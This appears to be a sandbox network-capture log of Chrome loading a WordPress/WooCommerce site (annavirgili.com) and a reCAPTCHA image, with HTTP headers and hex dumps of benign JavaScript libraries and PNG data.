                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:35 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:35 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Sat, 26 Mar 2022 17:38:09 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 3826
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:35 UTC3826INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 20 20 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 20 2f 2f 20 53 74 61 72 74 20 6f 66 20 75 73 65 20 73 74 72 69 63 74 0a 20 20 20 20 2f 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 20 20 20 20 52 65 73 69 7a 65 20 6d 65 67 61 20 6d 65 6e 75 0a 20 20 20 20 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 2a 2f 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 72 65 73 70 6f 6e 73 69 76 65 5f 6d 65 67 61 6d 65 6e 75 5f 69 74 65 6d 28 63 6f 6e 74 61 69 6e 65 72 2c 20 65 6c 65 6d 65 6e 74 29 20 7b 0a 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: ;(function ($) { "use strict"; // Start of use strict /* --------------------------------------------- Resize mega menu --------------------------------------------- */ function responsive_megamenu_item(container, element) {


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          120192.168.2.2449912172.217.19.1644437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:35 UTC709OUTGET /recaptcha/about/images/reCAPTCHA-logo@2x.png HTTP/1.1
                                                                                                          Host: www.google.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                          X-Client-Data: CIS2yQEIpbbJAQipncoBCIb0ygEIlqHLAQiFoM0BCP/QzgEInNLOAQiO084BGPTJzQE=
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: image
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:36 UTC778INHTTP/1.1 200 OK
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/recaptcha
                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="recaptcha"
                                                                                                          Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                          Content-Length: 18160
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Server: sffe
                                                                                                          X-XSS-Protection: 0
                                                                                                          Date: Thu, 12 Dec 2024 11:22:55 GMT
                                                                                                          Expires: Thu, 12 Dec 2024 12:12:55 GMT
                                                                                                          Cache-Control: public, max-age=3000
                                                                                                          Age: 2140
                                                                                                          Last-Modified: Wed, 29 Jul 2020 17:15:00 GMT
                                                                                                          Content-Type: image/png
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close
                                                                                                          2024-12-12 11:58:36 UTC612INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 98 00 00 01 d0 08 06 00 00 00 9c 30 7c 54 00 00 46 b7 49 44 41 54 78 da ec 9d 5b 6c 5c 47 19 c7 47 71 5b 01 6a cb 03 2d a8 d9 99 b3 be a4 b5 89 51 aa 62 89 e4 cc cc 3a de 3d 9b 4b 9b 36 40 23 4b 50 de 00 55 08 21 28 42 26 21 e5 c1 69 bc 17 97 ab a0 8a 6a 10 42 bd 24 3e 67 f6 ec da 25 14 28 0d 75 02 0f 48 08 54 a4 92 aa e4 a1 94 92 50 35 71 13 db bb 67 77 bd 89 bd cc d9 d8 84 48 ae 62 3b de 62 ef f9 ff a4 bf 66 bd 96 fc 64 9d 9f e6 fb be 33 43 00 00 00 00 b0 42 f4 f7 57 d7 59 df cd 6f 8c a7 bc 87 63 e9 d2 3e 6b a0 f0 4d 24 78 89 0e 4c ec df fa e8 78 22 f2 ad 7f ff 40 f6 9d 3e c4 fb 4e ff 5c c7 16 7d 6f 3e 27 fa ce fc 5a ec 3d f3 62 64 ef 5b 63 91 fd 67 8f 77 ec 39 7e 94 f2 e1 0c 13 ea b0 21 9d a7 0c
                                                                                                          Data Ascii: PNGIHDR0|TFIDATx[l\GGq[j-Qb:=K6@#KPU!(B&!ijB$>g%(uHTP5qgwHb;bfd3CBWYoc>kM$xLx"@>N\}o>'Z=bd[cgw9~!
                                                                                                          2024-12-12 11:58:36 UTC1390INData Raw: af 32 d3 dd d1 12 55 ed d4 54 ef 27 00 80 d5 df 8f f1 25 63 f9 92 49 43 32 c8 bb 08 e6 c1 13 57 04 53 f7 a8 ab 76 3f ec bf e2 c9 4d 50 91 7b 5b 7f f7 37 26 ec 17 b4 74 9e 08 0b f5 85 70 c4 fe f8 86 88 ba 9d 00 00 56 e3 4e 46 35 f5 a4 4a cd ba 16 ff 1d 2b 35 3d 6e 25 bd c0 3f 54 91 b9 24 97 2e 98 fa 8b 47 4b 87 bb 15 26 b3 05 2d 9e f3 fa bb 33 3a 27 28 b7 87 18 b7 bf dc 12 cd dd 7d 9b f8 d9 2d 04 00 b0 7a 76 32 b1 83 13 6d b1 54 e1 fb 56 aa 52 84 64 90 5a 92 de 0a 08 a6 fe e2 61 7e 8f 47 8e 78 7a bd 10 e2 ea 4d fd fd 4b 54 b8 07 98 50 bb 9b b7 0c 37 13 00 c0 ea e8 c9 58 e9 e2 68 3c 7d d1 83 64 90 9a 60 0e 4e 55 3b 3e 7d 7c 5e 30 6b 23 22 53 31 e4 c8 94 5e cf 69 d1 bc c2 b8 33 4c fd 72 9a 39 7c 4f 73 cf d8 fb 08 00 e0 ff 53 2e 8b 3e 56 b9 3b fe 78 79 34 9e
                                                                                                          Data Ascii: 2UT'%cIC2WSv?MP{[7&tpVNF5J+5=n%?T$.GK&-3:'(}-zv2mTVRdZa~GxzMKTP7Xh<}d`NU;>}|^0k#"S1^i3Lr9|OsS.>V;xy4
                                                                                                          2024-12-12 11:58:36 UTC1390INData Raw: 1c c7 eb a1 05 b5 50 2f 22 24 33 bb c9 f6 66 11 c1 1e da 9d d9 6d b3 ef 4d a3 a9 88 62 0d 68 11 73 2b ea ad 08 4a f1 90 25 ec bc 97 58 4f 95 1e 8a 27 2d 68 f6 cd 26 22 82 7f ea 41 14 a4 28 f1 4f 63 d3 d2 7a 10 5b 28 36 91 98 ec ee bc 9d cd a6 19 67 77 b3 61 b5 08 ad 79 49 76 77 be 1f f8 5e e7 f8 3e bc f9 fe de 7b c8 5d 24 62 4e 96 75 23 7b 3e 7a 50 c4 db fa b7 58 b0 73 e9 8e 8b cb 0d b9 40 30 40 a9 64 68 26 3f 44 79 e9 37 82 5d 4c 8b 0a e6 b3 d0 2f e6 2d 9b e4 c4 b2 66 e4 ae 44 8d ec 91 76 94 4b 57 fc ac a1 19 ce 74 a3 73 81 60 80 32 06 d3 33 3b fa 32 c5 21 62 97 7e 21 4c 56 42 bf a0 b7 a8 60 62 10 4c 6b c7 74 aa bd cc 5c 4f d2 39 a1 c5 c5 bd 6d d3 b9 90 da ce e5 92 b6 ba 73 81 60 80 42 b9 f8 3b a9 5d 3c 61 71 ef 77 ca dd 95 d0 2f e6 10 0c b2 9e 98 a2 fa
                                                                                                          Data Ascii: P/"$3fmMbhs+J%XO'-h&"A(Ocz[(6gwayIvw^>{]$bNu#{>zPXs@0@dh&?Dy7]L/-fDvKWts`23;2!b~!LVB`bLkt\O9ms`B;]<aqw/
                                                                                                          2024-12-12 11:58:36 UTC1390INData Raw: 44 40 08 11 51 54 b5 bc 20 a8 2a fa 00 02 2a f5 01 26 b1 cf 99 49 82 80 52 2e 02 a9 05 71 49 76 67 d7 01 04 08 68 41 a8 20 48 69 10 f0 82 40 50 89 a2 f0 40 44 c1 8e e7 ba 8e ed e9 99 43 56 aa 2a 23 bc f6 da 3b 76 fe 3f e9 af 5d c9 6f 5e ef f9 f9 fb be 73 ce b4 4a d6 1a 1b f0 af d9 e0 36 3e 64 6e 82 05 15 99 4a 30 a8 60 10 08 06 b4 0e 13 fe 6a ea c4 bb 98 88 27 a8 08 b0 a0 22 53 b5 c8 50 c1 20 10 0c 68 8d b2 9d 9e 40 79 f0 7b ca a3 af a5 64 b0 98 22 68 91 21 10 0c 68 0f 4c 84 9b a9 93 bc c7 1c b4 c6 10 08 06 81 60 40 9b a0 83 f1 0a 4b 84 8f 51 11 1d c2 75 30 08 04 83 40 30 a0 2d 6c 7a e0 b3 63 ca 83 fe 6f 98 93 7c c1 d0 1a 43 20 18 04 82 01 ed 82 39 e1 c5 54 24 2f 61 ee 82 40 30 08 04 03 da 38 d8 1f 3e 85 89 70 2b 13 c9 41 9c 79 41 a6 2b 98 73 af 78 35 25
                                                                                                          Data Ascii: D@QT **&IR.qIvghA Hi@P@DCV*#;v?]o^sJ6>dnJ0`j'"SP h@y{d"h!hL`@KQu0@0-lzco|C 9T$/a@08>p+AyA+sx5%
                                                                                                          2024-12-12 11:58:36 UTC1390INData Raw: cd 76 59 5e 04 43 07 46 a8 12 cc 22 20 7b f4 73 b6 cb 0c 5b 99 21 18 30 0d 2e 77 e2 95 59 0b 86 89 70 02 5b 93 3b 1c 11 1e 96 4b f2 26 e5 e1 45 5b bc 96 17 65 d5 2e a3 4e fc 76 53 32 39 98 c1 48 c1 f8 8b 45 30 4d c9 1c 47 f4 ea 63 78 c0 19 04 03 7e 00 53 8c 5e 65 39 c9 fb 18 ee 77 5e 2e 6a e6 c2 a3 ba 65 27 67 17 6c bb ab 30 23 9a 33 99 b8 39 93 e9 74 05 13 98 5b 47 98 12 cc 22 62 6d b6 95 d9 a8 ed 94 99 84 64 20 18 30 05 e5 87 d2 13 28 f7 ef 66 3c c2 70 bf 93 11 91 8a 29 82 3f 96 ed d1 d3 0b b3 47 b5 cb 4c 1e be 65 b9 87 d4 4c a6 a3 82 e1 81 12 cc 62 dc 7d 49 8a 95 3b 88 51 1b c7 36 66 08 06 fc 1f 8c 07 6b 2c 11 0d 51 07 cf db ef e4 7f f9 b2 d2 98 90 ef ef 2f db c3 a7 b4 f5 f3 bd 47 49 a6 39 93 81 60 e6 08 4d af dc a6 19 f5 31 9c fc 87 60 c0 61 d2 34 5d
                                                                                                          Data Ascii: vY^CF" {s[!0.wYp[;K&E[e.NvS29HE0MGcx~S^e9w^.je'gl0#39t[G"bmd 0(f<p)?GLeLb}I;Q6fk,Q/GI9`M1`a4]
                                                                                                          2024-12-12 11:58:36 UTC1390INData Raw: e7 49 5d 97 1d a9 60 9a 46 0a 46 cb e5 1d 25 97 ca 0f dd 7d 90 0b 04 93 5e f4 10 1d f5 9a ef 63 b9 65 82 c1 3e 0f 6a d1 87 54 07 fb 29 c5 7e 3e 0a fe 03 9d c9 9c 8c 60 28 13 77 9b 26 98 ae 05 3a 73 d9 85 cc 05 82 49 3d c4 11 8b a9 d7 f8 02 82 49 ee 8d 17 ca e4 06 aa 1f 10 4b 37 77 3e df ce 64 5a 13 10 cc 24 72 e9 1b 46 e6 02 c1 98 b1 9e bf c0 c4 43 94 05 fb 21 98 24 aa 97 20 b4 59 50 25 83 ad 52 8f 9a 35 ca 18 00 8d 32 19 47 7c 79 5c c9 44 95 9d 16 4c c3 18 c1 64 73 95 59 c8 5c 20 18 63 b8 8b 87 17 13 b7 ee 10 2e 6b 68 51 4e 26 7b a1 4c 8e 50 16 5e 62 58 ae a7 24 53 d7 99 cc e4 82 91 4d e2 89 c5 5a 30 06 04 fa dd f9 ca 77 c8 5c 20 18 63 b8 7d b0 7a 3d 71 e5 3a ec 1f 8b fd b4 ff d0 ab d4 6d 14 75 f5 62 18 0b d7 2a c9 b8 62 3b f5 c6 5b 93 5c 91 8d 1f 11 4c
                                                                                                          Data Ascii: I]`FF%}^ce>jT)~>`(w&:sI=IK7w>dZ$rFC!$ YP%R52G|y\DLdsY\ c.khQN&{LP^bX$SMZ0w\ c}z=q:mub*b;[\L
                                                                                                          2024-12-12 11:58:36 UTC1390INData Raw: 99 f8 88 e4 ca 6b 1b 67 6f ba f2 84 00 d0 73 81 08 98 4c 86 4a 39 45 a2 74 ed 88 28 21 60 cc b9 07 59 74 d0 53 d1 b7 c6 78 04 82 00 d2 b0 2c d6 98 67 41 cf 05 22 60 cc 41 f4 85 4b 45 5f ec 18 02 c6 a4 5b f4 57 84 7b c5 8a e8 b2 b2 1d 58 a2 9c 9e 4b 91 35 ea b9 04 11 2e 30 ae d5 c9 06 ac 0e f6 81 00 78 67 30 91 c5 14 2e 1d 58 a2 6c ce 23 92 29 ac 3b 45 5f 48 8c 3f f6 17 a4 57 b8 c4 7b 2e 08 17 38 6a 06 73 95 5e 37 09 80 37 60 fa 57 88 52 f8 37 04 8c 39 4b 94 45 29 f6 5d 49 65 78 a6 00 d2 2a 5c d0 73 81 e3 04 4c c8 e6 54 3f 11 00 6f c0 84 5f 15 bd d1 93 08 18 93 1a fc 52 74 27 95 c8 a6 0a 20 3d c2 a5 38 30 c7 52 20 ff 8a 70 81 e3 04 4c 38 cb a9 79 05 c0 07 0d 8a ab c8 53 08 98 54 8d e8 1e 6f f8 06 f9 a1 cb d7 ff 94 00 d2 20 5c d8 9c a9 76 f6 13 7a 2e f0 0e
                                                                                                          Data Ascii: kgosLJ9Et(!`YtSx,gA"`AKE_[W{XK5.0xg0.Xl#);E_H?W{.8js^77`WR79KE)]Iex*\sLT?o_Rt' =80R pL8ySTo \vz.
                                                                                                          2024-12-12 11:58:36 UTC1390INData Raw: 17 b7 dd 21 e4 02 00 08 86 c4 9c b9 8c f9 3b 72 01 00 04 43 e2 c4 ed 34 e9 8c 0f 0e 0e b2 2c 06 00 08 86 c4 ad b9 38 c8 05 00 10 0c 89 26 17 6a 2e 00 80 60 48 f4 65 31 6a 2e 00 80 60 48 f4 99 0b 35 17 00 40 30 a4 34 72 61 e6 02 00 08 86 44 af b9 48 3a 8c 5c 20 90 65 d9 fc 04 00 c1 90 18 cf b9 b0 5b 0c a6 09 67 cc 59 30 db 3b 3a 3a 16 25 00 08 86 b0 15 19 62 d1 d7 d7 57 ef d3 1b c6 fd 2a 86 26 24 03 08 86 50 73 81 28 b4 b5 b5 2d 93 74 73 78 78 38 ec 28 9c 70 ff 38 c9 a9 d9 80 60 c8 1f d5 5c 24 3d f2 a9 c8 d4 5c e0 07 cd cd cd f3 dc 37 4e 85 ad ea df cf a0 2b 48 9a 70 1a 99 c9 00 82 21 bf 4c f8 df 53 73 81 62 a4 69 ba de e3 73 34 88 25 f4 95 19 92 79 e3 ef 27 98 c9 00 82 21 b9 91 34 15 17 70 cf 38 4b 13 80 ef 84 9b 0d f7 91 8b 33 e4 32 4b 32 1e b3 af 79 83
                                                                                                          Data Ascii: !;rC4,8&j.`He1j.`H5@04raDH:\ e[gY0;::%bW*&$Ps(-tsxx8(p8`\$=\7N+Hp!LSsbis4%y'!4p8K32K2y
                                                                                                          2024-12-12 11:58:36 UTC1390INData Raw: 4d 91 fd f2 9d 6b 59 ee f6 7a 3a bc bf 7c bb d5 63 7f 09 91 f9 c0 63 c5 5a 44 06 43 60 a0 e4 29 cd 3e 1e 77 1f e8 f5 40 7a 5f 5f 5f df f2 9e 9e 9e cb 33 19 84 c5 2c b3 97 b7 c5 ed 73 50 d2 29 b7 55 bd ff 28 09 91 19 71 3f 59 83 c8 60 08 0c 94 9c 9f c9 e7 13 26 24 ed 77 8e e1 09 7b 35 2b f3 93 01 ea 69 20 89 12 2f 8d 21 2c 16 da 47 25 bd 67 fe cc 4f 92 a8 fb 7e 52 10 19 49 c3 23 23 23 eb 10 19 0c 81 81 b9 78 34 53 3e 7e 22 69 bb 69 1d 1d 1d 5d 9a f7 6a 2e aa d5 bd 5a 62 ca b1 eb b8 35 d9 63 79 d2 9f 7d 50 d2 1f 08 4b d1 75 32 39 1f 87 c3 93 61 da 3b 86 c0 c0 5c a7 36 07 87 dd 37 de 70 1f 79 cc ac 8d 15 eb 31 fb 2c 06 96 1a d8 17 bf d1 9f e9 6a 49 77 f8 73 ef 8c 15 ec 92 72 f1 d9 f9 3e 94 24 32 43 ee 0f ab f1 64 30 04 06 e6 2c 34 81 a4 d3 ee 27 df 98 d7 25
                                                                                                          Data Ascii: MkYz:|ccZDC`)>w@z___3,sP)U(q?Y`&$w{5+i /!,G%gO~RI###x4S>~"ii]j.Zb5cy}PKu29a;\67py1,jIwsr>$2Cd0,4'%
                                                                                                          2024-12-12 11:58:36 UTC1390INData Raw: fd e5 44 34 46 20 10 8c e6 ff 5e 06 f8 7b b6 b9 96 c5 ae 15 9f 35 76 59 c1 a1 d7 8b 82 0d cd 64 56 f7 63 fb 32 00 71 3b 73 b1 05 73 9e fb 9f 10 d1 38 81 40 30 ba e5 c2 1c e5 fe 0a b7 5c ae 9d 59 79 d6 b8 0f 0a 9b df 2d 32 ea 7f 97 2a 84 33 32 00 c4 a1 5c 78 59 fc 22 f7 f3 89 28 45 20 10 8c 07 72 f9 83 bf 5f 3a 11 4d 16 37 98 d4 cf ac 94 74 df c1 2c bf 51 7f 9c 54 15 24 03 40 7c cd 5c da b9 f5 0f 8f 7d 04 82 d1 5d 73 b1 e5 c2 fd 8c 91 fc 82 3d 99 dd 39 31 a3 e8 e0 ea 52 d9 70 5c aa ca 41 48 06 80 b8 98 b9 74 70 3f 10 0c 06 ef 17 08 04 e3 45 cd c5 96 4b 20 10 98 22 46 98 39 9f 76 dd b3 d2 df bc 76 9b b1 eb 94 54 38 ed 0f c0 28 97 4b 27 b7 c1 48 24 f2 80 40 20 18 0f 96 c5 6c b9 ac 70 e4 a2 23 4f e7 74 df 9b e9 fb 65 3d 4b e6 0c 99 21 cc 64 00 18 85 72 61 ba
                                                                                                          Data Ascii: D4F ^{5vYdVc2q;ss8@0\Yy-2*32\xY"(E r_:M7t,QT$@|\}]s=91Rp\AHtp?EK "F9vvT8(K'H$@ lp#Ote=K!dra


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          121192.168.2.2449915147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:35 UTC743OUTGET /wp-content/plugins/woocommerce-products-filter/js/html_types/checkbox.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:36 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:35 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 3340
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:36 UTC3340INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 66 75 6e 63 74 69 6f 6e 20 77 6f 6f 66 5f 69 6e 69 74 5f 63 68 65 63 6b 62 6f 78 65 73 28 29 20 7b 0a 20 20 20 20 69 66 20 28 69 63 68 65 63 6b 5f 73 6b 69 6e 20 21 3d 20 27 6e 6f 6e 65 27 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 63 68 65 63 6b 62 6f 78 5f 74 65 72 6d 27 29 2e 69 43 68 65 63 6b 28 27 64 65 73 74 72 6f 79 27 29 3b 0a 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 63 68 65 63 6b 62 6f 78 5f 74 65 72 6d 27 29 2e 69 43 68 65 63 6b 28 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 68 65 63 6b 62 6f 78 43 6c 61 73 73 3a 20 27 69 63 68 65 63 6b 62 6f 78 5f 27 20 2b 20 69 63 68 65 63 6b 5f 73 6b 69 6e 2e 73 6b 69 6e 20 2b 20 27 2d 27 20 2b 20 69
                                                                                                          Data Ascii: "use strict";function woof_init_checkboxes() { if (icheck_skin != 'none') { jQuery('.woof_checkbox_term').iCheck('destroy'); jQuery('.woof_checkbox_term').iCheck({ checkboxClass: 'icheckbox_' + icheck_skin.skin + '-' + i


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          122192.168.2.2449917147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:35 UTC571OUTGET /wp-content/plugins/woocommerce/assets/js/select2/select2.full.min.js?ver=4.0.3-wc.6.6.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:36 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:36 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 24 Jun 2022 09:41:11 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 74131
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:36 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 65 6c 65 63 74 32 20 34 2e 30 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 73 65 6c 65 63 74 32 2e 67 69 74 68 75 62 2e 69 6f 0a 20 2a 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 65 6c 65 63 74 32 2f 73 65 6c 65 63 74 32 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 2e 6d 64 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 28 72 65 71 75
                                                                                                          Data Ascii: /*! * Select2 4.0.3 * https://select2.github.io * * Released under the MIT license * https://github.com/select2/select2/blob/master/LICENSE.md */!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?e(requ
                                                                                                          2024-12-12 11:58:36 UTC16384INData Raw: 53 65 6c 65 63 74 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 67 65 74 28 22 65 73 63 61 70 65 4d 61 72 6b 75 70 22 29 28 6e 28 65 2c 74 29 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 6c 65 63 74 69 6f 6e 43 6f 6e 74 61 69 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 28 27 3c 6c 69 20 63 6c 61 73 73 3d 22 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 5f 5f 63 68 6f 69 63 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 5f 5f 63 68 6f 69 63 65 5f 5f 72 65 6d 6f 76 65 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 3e 26 74 69 6d 65 73 3b 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 27 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 75
                                                                                                          Data Ascii: Selection");return this.options.get("escapeMarkup")(n(e,t))},o.prototype.selectionContainer=function(){return i('<li class="select2-selection__choice"><span class="select2-selection__choice__remove" role="presentation">&times;</span></li>')},o.prototype.u
                                                                                                          2024-12-12 11:58:36 UTC16384INData Raw: 74 61 28 74 68 69 73 2c 22 64 61 74 61 22 29 7d 29 7d 2c 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 71 75 65 72 79 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 5b 5d 2c 69 3d 74 68 69 73 3b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 63 68 69 6c 64 72 65 6e 28 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 72 28 74 68 69 73 29 3b 28 65 2e 69 73 28 22 6f 70 74 69 6f 6e 22 29 7c 7c 65 2e 69 73 28 22 6f 70 74 67 72 6f 75 70 22 29 29 26 26 28 65 3d 69 2e 69 74 65 6d 28 65 29 2c 6e 75 6c 6c 21 3d 3d 28 65 3d 69 2e 6d 61 74 63 68 65 73 28 74 2c 65 29 29 26 26 6e 2e 70 75 73 68 28 65 29 29 7d 29 2c 65 28 7b 72 65 73 75 6c 74 73 3a 6e 7d 29 7d 2c 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 4f 70 74 69 6f 6e 73 3d 66 75 6e 63 74
                                                                                                          Data Ascii: ta(this,"data")})},n.prototype.query=function(t,e){var n=[],i=this;this.$element.children().each(function(){var e=r(this);(e.is("option")||e.is("optgroup"))&&(e=i.item(e),null!==(e=i.matches(t,e))&&n.push(e))}),e({results:n})},n.prototype.addOptions=funct
